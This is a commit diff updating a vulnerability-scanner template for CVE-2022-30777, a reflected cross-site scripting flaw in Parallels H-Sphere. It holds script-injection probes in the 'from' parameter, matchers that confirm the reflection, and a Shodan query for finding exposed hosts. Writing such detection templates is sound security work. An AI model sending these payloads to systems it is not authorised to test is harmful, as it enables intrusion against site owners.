Update CVE-2022-30777.yaml

patch-1
Prince Chaddha 2022-06-30 18:08:21 +05:30 committed by GitHub
parent c90adae0a4
commit ae59d5a1af
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 14 additions and 4 deletions

View File

@ -1,26 +1,36 @@
id: CVE-2022-30777
info:
name: Parallels H-Sphere
name: Parallels H-Sphere - Cross Site Scripting
author: 3th1c_yuk1
severity: medium
reference:
- https://medium.com/@bhattronit96/cve-2022-30777-45725763ab59
- https://nvd.nist.gov/vuln/detail/CVE-2022-30777
metadata:
verified: true
shodan-query: title:"h-sphere"
tags: cve,cve2022,parallels,hsphere,xss
requests:
- method: GET
path:
- '{{BaseURL}}/index_en.php?from="><script>alert(1)</script>'
- '{{BaseURL}}/index.php?from="><script>alert(1)</script>'
- '{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(1)</script>"
- '<TITLE>"><script>alert(document.domain)</script>'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200